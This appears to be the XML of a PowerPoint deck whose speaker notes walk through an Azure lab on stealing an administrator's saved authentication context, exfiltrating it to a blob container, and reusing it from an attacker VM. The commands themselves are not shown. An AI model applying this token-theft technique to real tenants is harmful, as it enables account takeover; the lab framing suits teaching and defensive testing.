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691" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="11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B2AE0E-06BE-4BD4-B063-17FAC4DD2CA6}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021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4E465-663E-431C-8332-9DA09451C337}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2789927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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> session within the cloud shell pane, run the following commands to download and verify a script to provision the scenario for this session.</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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347276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Exfiltrate the compressed authentication context to the blob container that was created earlier (By the script) using the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HTTPie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command. Replace the &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>blob_container_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; placeholder with the value of Exfiltration Storage Location that you copied from the script’s output. Ensure that there are no line breaks before pasting this. You should get an HTTP 201 response.</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="982827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 that the compressed authentication context now exists in the storage account by browsing to it in the Azure portal. The Storage account has a naming format of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentestXXXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (XXXX is a set of random digits that are generated by the deployment script).</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3155223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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> console and verify that you currently do not have a connection to the victim’s Azure environment by using the following command. You should get an error message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> if you are authenticated, use Disconnect-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AzAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to log out.</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="895677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Download and verify the exfiltrated context file using the following command. Replace the &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>blob_container_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; placeholder with the value of Exfiltration Storage Location that you copied from the script’s output.</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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3302217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Extract the downloaded file using the following command and verify the extracted file.</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11641962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Restore the authentication context to your machine using the following command.</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="892656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 that the context has successfully been applied to your machine by running commands with the stolen admin authentication context. At this point, you have validated that an authentication context can be stolen from an administrator’s system, exported, and reused from an attacker’s system.</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3325868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completed , go back to Azure Cloud Shell run the following command to download a clean up script and verify the download.</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3660254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downloaded script to clean up the resources that were created for this using the following command.</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2733365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the download script using the following command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When prompted to enter a password, enter myPassword123 and press Enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wait for the deployment to complete. The deployment could take up to 20 minutes to complete.</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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81435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script has finished running, the key information that you will need for the rest will be displayed in the output section. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy this information into Notepad document for later reference. There are six values that you will need from the output session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Azure Admin User: This is Azure Administrator username whose token will be stolen from a Windows PC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Azure Admin User Password: This is the password of the Azure administrator use whose credential will be stolen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows VM Public IP: The Public IP of the Windows VM that the token will be stolen from.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows VM Username: The local user that you will use to authenticate to the Windows VM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows VM User Password: The password of the local user that you will use to authenticate to the Windows VM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exfiltration Storage Location: The blob container that you will exfiltrate the stolen credential to and download it from for reuse from your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> VM.</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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3717037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an RDP client on your PC and connect to the Windows VM Public IP that you made a note of in the output section. When prompted to authenticate, use the Windows VM Username value as the username and the Windows VM User Password value as the password.</a:t>
            </a:r>
          </a:p>
          <a:p>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3354887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Within the RDP session to Windows VM Public IP, Open a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> console and authenticate to Azure using the following command</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
          <a:p>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1644731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prompted to authenticate, use the Azure Admin User value (from the script’s output) as the username and the Azure Admin User Password value (also from the script’s output) as the password</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64127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Verify authentication using the following command.</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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62656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can pretend that we’re acting as the victim admin user and saving our current context for later use. We (as an attacker) would then copy this file to our system. Alternatively, imagine that you’re an attacker with an active session on this system and that you want to save the current context for exfiltration to another system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save the current authentication context and verify that the context has been saved using the following command.</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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2465656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 the saved authentication context using the following command.</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0A54E465-663E-431C-8332-9DA09451C337}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398327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8002-75E7-4138-92B4-36142A1547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BAEA5260-7C09-4243-AA49-9632DB4049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5B16C60A-6732-4E4F-8127-4260505FE867}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D338AE-FAFA-4175-B84D-D21377A04A4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1C88201-D680-4785-85B2-F4AC1B760AE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340737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659C-0B0B-4A61-9CD6-311FCBAAEC5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6CE92AA-19BE-45BC-82B0-3BB854BC34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2562522-0F92-4426-A579-479B8315CA47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C85F82E8-095F-4A9F-A5E8-8BC58C48859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826E124-164C-409C-97E7-D4B2E1D8F2E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411359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2E328-CF28-4B30-81F3-4EF8FDBA39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2042ADD-06E4-4A87-91AF-FCE452BB1B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4AC25DF-3AE0-4888-BF55-5530241C2AA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74814378-28DF-4EB7-8193-D72F071F32F0}"/>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9DF505E-2C4A-4F4C-9DB8-ED09F7E716A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3577250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CFA5-9DDB-4866-AB10-6EEEC03F145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4B73AC0-F9B1-4E24-9C19-B6D0F10D15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98C35F3-A8D8-4DCF-9C14-5A858F256046}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47198A46-7E36-4E20-8C55-2AA4CAB67E9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B83DF90-0CED-470A-BBE3-C5C80755048D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86303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4A3F-4AF0-4F5D-B0C6-993F679A5B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06C1E96D-5A5C-4733-9789-7C79514308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5BED78-2969-4B26-88C5-1DC4075D291B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96895C7-B3BC-407E-9F2D-56CD8FE2946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83CFD56-4CA5-4229-A060-5C73F0548B47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253111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4800-6EFB-4F7C-AF15-25E41A2153E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FB73B71-5BC4-41C8-9FA3-C86777195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E8D382A-B8D9-4B7F-90BA-111D59F303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D337910B-41A8-4BD2-AD45-EECC7276ED6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5052AFDA-4BEF-4A9C-8114-192C4F1FD6B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8853B83-EF1F-4508-A44A-79671C30961F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47042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49D5-CA7A-4613-BAC9-0EBCC1AB077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689BBBD-4176-46DA-9D84-CB727AC2C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C402A3-9227-4BBD-9AF8-6B4B6B38B6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0DC62BE-1679-4AEA-9B84-7DC920A08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08AE3-87F4-4651-BA86-D388D92C03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987FA87-5D1C-4667-878E-DDCBE826DBFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC172B16-14C2-498D-9EA3-315AC456672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426EBF4-1CE3-4E6E-A4CB-08D103F9E4AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361451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BD9D-B5C6-4660-BBEA-0E8AE41915E3}"/>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0937A5A-7C3B-4553-934C-17F41FB8D93B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8079CA05-D33A-47B9-B7A2-5ABE586629E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00C39F97-C166-4779-A92F-B7A80C4EE249}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
